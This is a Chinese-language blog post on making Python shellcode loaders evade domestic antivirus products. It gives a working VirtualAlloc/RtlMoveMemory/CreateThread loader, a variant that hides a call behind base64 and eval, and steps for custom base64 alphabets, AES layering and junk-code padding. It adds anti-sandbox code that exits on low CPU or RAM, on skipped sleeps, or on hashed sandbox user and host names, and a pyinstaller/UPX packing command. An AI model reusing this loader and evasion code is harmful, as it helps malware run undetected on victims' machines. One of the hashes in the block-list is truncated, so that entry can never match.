Python魔改加密免杀
参考了几个 Python 免杀的项目,自己也随手实现一个,用于绕过国内主流杀软的检测。
免杀最终效果图
免杀首先要选取 shellcode 加载器,一般在网上搜一篇免杀文章,选用相同的加载器即可。不过这种"VirtualAlloc 申请 RWX 内存 + RtlMoveMemory 拷贝 + CreateThread 执行"的经典加载器行为特征很明显,杀软早已熟知,下面的测试也正说明了这一点。
import ctypes
# shellcode loader
def shellCodeLoad(shellcode):
    """Copy *shellcode* into a freshly allocated RWX region and run it on a new thread.

    Args:
        shellcode: a writable buffer (the caller passes a ``bytearray``) holding
            raw machine code. ``from_buffer`` below rejects read-only ``bytes``.

    Returns:
        None. Blocks until the payload thread terminates (INFINITE wait).

    NOTE(review): none of the Win32 return values are checked - a NULL from
    VirtualAlloc or CreateThread is passed straight into the next call instead
    of raising. This hands the process over to arbitrary machine code; run it
    only against payloads you are authorised to execute.
    """
    # Declare the return value as a 64-bit integer; ctypes' default c_int
    # restype would truncate any address above 4 GiB on x64.
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE:
    # one RWX region exactly the size of the payload. (An RWX allocation
    # from a script host is itself a common detection heuristic.)
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    # ctypes array that shares the caller's buffer memory - this is why the
    # argument must be a mutable bytearray.
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    # Copy the payload into the executable region.
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
    # Start a thread whose entry point is the RWX buffer. No restype is set
    # for CreateThread, so the HANDLE comes back through the default c_int and
    # is re-wrapped as c_int below - presumably fine for the small handle
    # values Windows hands out, but not strictly 64-bit clean; TODO confirm.
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    # -1 == INFINITE: block until the payload thread exits.
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
if __name__ == "__main__":
    # Placeholder bytes standing in for the real payload. A bytearray (not
    # bytes) is required because the loader builds its ctypes view with
    # ``from_buffer``, which needs a writable buffer.
    shellCodeLoad(bytearray(b'shellcode'))
测试下效果
很遗憾,文件还没落地就被查杀了。
尝试给关键调用加一层 base64 编码:
import ctypes
import base64
def shellCodeLoad(shellcode):
    """Same RWX-allocate / copy / CreateThread loader as above, with the
    RtlMoveMemory call hidden behind ``eval(base64.b64decode(...))``.

    Args:
        shellcode: writable buffer (``bytearray``) of raw machine code.

    Returns:
        None. Blocks until the payload thread terminates.

    NOTE(review): the base64 literal decodes to the RtlMoveMemory call that
    the commented-out line below still shows, so runtime behaviour is
    unchanged - this is purely static obfuscation of the source text; the same
    Win32 call sequence (RWX alloc, copy, thread start) still happens and is
    what a behavioural scanner sees. ``eval`` on a constant baked into the
    program is not an injection risk by itself, but it does hide the call
    from readers, linters and any reviewer diffing this file.
    As before, no Win32 return value is checked.
    """
    # 64-bit restype so the returned address is not truncated on x64.
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    # MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE.
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    # ctypes array sharing the caller's bytearray memory.
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    #ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
    # Evaluates the call kept in the comment above; relies on ``ptr``, ``buf``
    # and ``shellcode`` being visible to eval() as locals of this function.
    eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
    # Thread entry point is the RWX buffer; CreateThread's restype is left at
    # the default c_int (see the first loader for the caveat).
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    # -1 == INFINITE.
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
if __name__ == "__main__":
    # Placeholder payload; must be a bytearray because the loader uses
    # ctypes ``from_buffer`` on it.
    shellCodeLoad(bytearray(b'shellcode'))
依然没能落地,看来这位大哥给的方法已经不太行了,很遗憾白嫖免杀失败的一天。这也不意外:base64 只是编码,不改变程序实际执行的 ctypes 调用序列,对动态/行为检测基本没有作用。
魔改 base64 的编码表:自己编写一个 base64 模块,修改编码所用的字符集并打乱排序规则,不使用 Python 自带的 base64 模块,自行实现编码和解码。
自定义 Base64 字符集之后,市面上通用的 base64 解码工具就无法直接解出原文。但要注意这只是混淆而不是加密:自定义字符集必然随程序一起分发,拿到样本的分析人员从代码里就能恢复它。
从 LeetCode 拉取一些算法题的解法代码作为花指令(无实际作用的填充代码)插入,参考几道算法题即可。
把 shellcode 加载器的源码改为通过 exec 执行,先做 AES 加密,再用魔改的 base64 对 shellcode 编码混淆两次。注意若 AES 密钥同样内置在程序中,这一层起到的也只是混淆作用。
加入反沙箱逻辑(反沙箱规则可以直接复用 GitHub 上开源免杀项目的,伸手党复制粘贴即可),防止在虚拟机或沙箱中被调试运行。
def get_sanbox_users():
    """Return the block-list of sandbox user names as SHA-256 hex digests.

    Presumably each entry is ``hash_name(<user name>)`` (the constant-salted
    digest computed by hash_name below), so the plain names never appear in
    the binary; check_vm compares the digest of the current user against it.

    NOTE(review): this list is identical to get_sanbox_computers() except for
    the 18th entry, which here is only 63 hex characters long
    (``...e9beb4d7f7b``) and therefore can never equal a 64-character SHA-256
    hexdigest - looks like a copy-paste truncation; confirm against the list
    it was taken from. The function name keeps the original "sanbox" spelling
    because check_vm calls it by that name.
    """
    users = [
        "3e93bb7b2887e4881fa7da105c8d95b1893a8373e2e24bee8460dcb69bd3cf04",
        "2cd7b171d2155f0878a5b89ac6fea662241d05e7ef1555452a92006d2a7021f9",
        "7707505e68f824301174b8824a9b9df32605193986fbcb61d0a18d0d28cf9e56",
        "414efb531d1cb23f5778650492d0c7cae356a9633479ef59b1e2169ff9823265",
        "8af67b85a6d66d4c84eb00dc9b4a662a88be1f6339c343f0f27403745ca5fec5",
        "97c27f98cb4a1af26817b4137ef1baab09d6407e423cf1b99997289cc9786c38",
        "14a3ca62b588cf9aa4e9164a4882d66fff67d0a09ba29aeca41b780583901370",
        "cd5f0ac52ead5ad93bb7f732aabf554bf61f8a3070f50b02a91a7b3db99c3205",
        "880473c8b0932cd60b918c0476ad84430739d77f4a01898bb214c842b7d25bd2",
        "01568c005922d1a75fc61738c75c4546870ecc5a5571c83934ccab5ab4156ea8",
        "d06b048d8ab08ee0778dd18bea5fe42b78dcb3bec7b6c57a3f029168e10edcd3",
        "6cf318048779a91ef96bd2cd1ead164c12d1c57e0b2ffc27f4fa184242a960dd",
        "b6ca2c4d97e775b984312c0c383097dd9b8beadbbb5d1f516441a0372b443d38",
        "7f4d76ebe8a027c4d0f198f14971bf09400c9452efca9d458fef22be1b73118d",
        "dcac8e623396c5f9459460209c55435ef52bb16424edf6da136ba84cd2b35982",
        "e831df0ae56afd1a0a086d723e7876a7096428284c2efd40a611c4dece5d226c",
        "9c4c99c53a93995dc9630b1c0b384955a71904c360e8596cef5811a9e45f2b8b",
        # 63 hex chars - can never match a SHA-256 digest (see docstring).
        "67f6331ef1bd6d094ce49dfdf2e9cd86e636c8aa88a6c9b86c86e9beb4d7f7b",
        "709175a4a328264d72a2e92e16ffa4a6e6eadf72da354e3673f5e27cac92bf63",
        "a0a3531a232f67d10627647ad48d0eb032d4b5dde05bf229cdbd5be6798747b5",
        "6d376cff5c619aa02f76b8742c4b4eedd54ffa2582afedee465d150ba2b0b438",
        "34ac133f0eac7f69b29f86eff4954c739203eaf4855b6c82a201f039268c937e",
        "d3d3e02d666cabb5e26b33de344b5bb08095a1bd73be8201800b56f26ee29d38",
        "1f3dfcc66198c87416e8004e33c932b94cfecac38732dd895e4324add7ab4c91",
        "8a08da7c7ac2a709e019a97699d1a3f920680ad712207d23134426a53f0c95e4",
        "3be0c9573bc4b1e81c26bbb77e00c4d585868fe44dcfce48c5924dea9f2b49ca",
        "5a6e0bd92925b9f91ffec26805eb653f8d5117e8b4813248a87b55765729c0a2",
        "f0b35713f16c4d9cfdbe4dc9b7cc7c8f24676e81cffe1150c8529205a4426d71",
        "19203833e3dc9e0871ee98daa166f8817c2deedc44fd8371a55dc0119003ba5c",
        "71bc0e605d52850557bf58f35f60f4deee63ceb2b2613d36e1a87f1a63483c3e",
        "2da5c4ea837e60abf644c217ed0f360a1221d033b3ef7486ab267dc5ffa31841",
        "dfca1dca8404208458945cc023a905306dc15e4680c0803055210bc71858ecdd",
        "a6687db04a62d5b549b1fb9dbc42af981949aa2349a47ac3cc1128d2839ffe2e",
    ]
    return users
def get_sanbox_computers():
    """Return the block-list of sandbox host names as SHA-256 hex digests.

    Presumably each entry is ``hash_name(<host name>)`` (constant-salted
    digest, see hash_name below); check_vm compares the digest of
    ``gethostname()`` against it.

    NOTE(review): the list is entry-for-entry the same as get_sanbox_users()
    (only the 18th entry differs, and there the users copy is truncated), so
    either both were copied from one combined list or the host-name list was
    never filled in separately - confirm. Name keeps the original "sanbox"
    spelling because check_vm calls it by that name.
    """
    computers = [
        "3e93bb7b2887e4881fa7da105c8d95b1893a8373e2e24bee8460dcb69bd3cf04",
        "2cd7b171d2155f0878a5b89ac6fea662241d05e7ef1555452a92006d2a7021f9",
        "7707505e68f824301174b8824a9b9df32605193986fbcb61d0a18d0d28cf9e56",
        "414efb531d1cb23f5778650492d0c7cae356a9633479ef59b1e2169ff9823265",
        "8af67b85a6d66d4c84eb00dc9b4a662a88be1f6339c343f0f27403745ca5fec5",
        "97c27f98cb4a1af26817b4137ef1baab09d6407e423cf1b99997289cc9786c38",
        "14a3ca62b588cf9aa4e9164a4882d66fff67d0a09ba29aeca41b780583901370",
        "cd5f0ac52ead5ad93bb7f732aabf554bf61f8a3070f50b02a91a7b3db99c3205",
        "880473c8b0932cd60b918c0476ad84430739d77f4a01898bb214c842b7d25bd2",
        "01568c005922d1a75fc61738c75c4546870ecc5a5571c83934ccab5ab4156ea8",
        "d06b048d8ab08ee0778dd18bea5fe42b78dcb3bec7b6c57a3f029168e10edcd3",
        "6cf318048779a91ef96bd2cd1ead164c12d1c57e0b2ffc27f4fa184242a960dd",
        "b6ca2c4d97e775b984312c0c383097dd9b8beadbbb5d1f516441a0372b443d38",
        "7f4d76ebe8a027c4d0f198f14971bf09400c9452efca9d458fef22be1b73118d",
        "dcac8e623396c5f9459460209c55435ef52bb16424edf6da136ba84cd2b35982",
        "e831df0ae56afd1a0a086d723e7876a7096428284c2efd40a611c4dece5d226c",
        "9c4c99c53a93995dc9630b1c0b384955a71904c360e8596cef5811a9e45f2b8b",
        "67f6331ef1bd6d094ce49dfdf2e9cd86e636c8aa88a6c9b86c86e9beb4d7f7b9",
        "709175a4a328264d72a2e92e16ffa4a6e6eadf72da354e3673f5e27cac92bf63",
        "a0a3531a232f67d10627647ad48d0eb032d4b5dde05bf229cdbd5be6798747b5",
        "6d376cff5c619aa02f76b8742c4b4eedd54ffa2582afedee465d150ba2b0b438",
        "34ac133f0eac7f69b29f86eff4954c739203eaf4855b6c82a201f039268c937e",
        "d3d3e02d666cabb5e26b33de344b5bb08095a1bd73be8201800b56f26ee29d38",
        "1f3dfcc66198c87416e8004e33c932b94cfecac38732dd895e4324add7ab4c91",
        "8a08da7c7ac2a709e019a97699d1a3f920680ad712207d23134426a53f0c95e4",
        "3be0c9573bc4b1e81c26bbb77e00c4d585868fe44dcfce48c5924dea9f2b49ca",
        "5a6e0bd92925b9f91ffec26805eb653f8d5117e8b4813248a87b55765729c0a2",
        "f0b35713f16c4d9cfdbe4dc9b7cc7c8f24676e81cffe1150c8529205a4426d71",
        "19203833e3dc9e0871ee98daa166f8817c2deedc44fd8371a55dc0119003ba5c",
        "71bc0e605d52850557bf58f35f60f4deee63ceb2b2613d36e1a87f1a63483c3e",
        "2da5c4ea837e60abf644c217ed0f360a1221d033b3ef7486ab267dc5ffa31841",
        "dfca1dca8404208458945cc023a905306dc15e4680c0803055210bc71858ecdd",
        "a6687db04a62d5b549b1fb9dbc42af981949aa2349a47ac3cc1128d2839ffe2e",
    ]
    return computers
def hash_name(i_str: str) -> str:
    """Return the SHA-256 hex digest of *i_str* with the fixed suffix ``"CanUGuessMe?"`` appended.

    The suffix stops the block-lists in get_sanbox_users/get_sanbox_computers
    from being reversed with an off-the-shelf SHA-256 lookup table, but it is
    a constant shipped inside the program, so anyone holding the binary can
    recompute every digest - treat it as obfuscation, not a secret.

    ``sha256`` is not imported in the visible part of the file; presumably
    ``from hashlib import sha256`` sits above - TODO confirm.
    """
    i_str += "CanUGuessMe?"
    return sha256(i_str.encode()).hexdigest()
def check_vm() -> None:
    """Sandbox / VM heuristics: terminate the process if the host looks like an analysis box.

    Checks, in order: a 2 s sleep really takes at least 2 s of wall-clock
    time, at least 3 logical CPUs, at least 2 GiB of RAM, and the salted
    hash of the current user name / host name is not on the block-lists.

    Returns None on a host that passes every check; otherwise the process is
    exited.

    Needs ``psutil``, ``time``, ``getuser``, ``gethostname`` and ``cpu_count``
    in scope - their imports are outside the visible part of the file.

    NOTE(review):
      - the sleep check exits with status 1, the others with 0; presumably
        unintentional - pick one.
      - the ``print`` below is a leftover debug line that writes the user's
        salted hash and the whole block-list to stdout on every start.
      - ``exit`` is the ``site``-module helper, not ``sys.exit``; it may be
        absent in a frozen (PyInstaller) build - confirm, or use sys.exit.
      - ``compuer`` is a typo for ``computer`` (left alone: renaming is a
        code change, not documentation).
    """
    # Total physical RAM in GiB, rounded to 2 decimals.
    total = round(psutil.virtual_memory().total / (1024.0 * 1024.0 * 1024.0), 2)
    pre = int(time.time())
    user = getuser()
    compuer = gethostname()
    # Presumably aimed at sandboxes that fast-forward sleep(): if less than
    # 2 s of wall-clock time elapsed, bail out. (Timestamps are truncated to
    # whole seconds, so a genuine >= 2 s sleep always yields a delta >= 2.)
    time.sleep(2)
    now = int(time.time())
    if now-pre < 2:
        exit(1)
    # Fewer than 3 logical CPUs -> treat as an analysis VM.
    if cpu_count() < 3:
        exit(0)
    # Less than 2 GiB of RAM -> treat as an analysis VM.
    if total < 2:
        exit(0)
    # Debug leftover: dumps the hash and the full block-list to stdout.
    print(hash_name(user),get_sanbox_users())
    # Block-list checks on the salted hashes of user name and host name.
    if hash_name(user) in get_sanbox_users():
        exit(0)
    if hash_name(compuer) in get_sanbox_computers():
        exit(0)
用 pyinstaller 生成 exe 时启用 UPX 压缩,体积缩减到 6.68M;用 Python 制作的免杀文件体积普遍偏大。
# Freeze to a single windowless exe. --upx-dir expects the directory that
# contains upx(.exe); its value is empty here, so fill it in (or drop the
# flag to skip UPX compression).
pyinstaller -i teaa.ico -F tesioa.py --noconsole --upx-dir=
原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/8141.html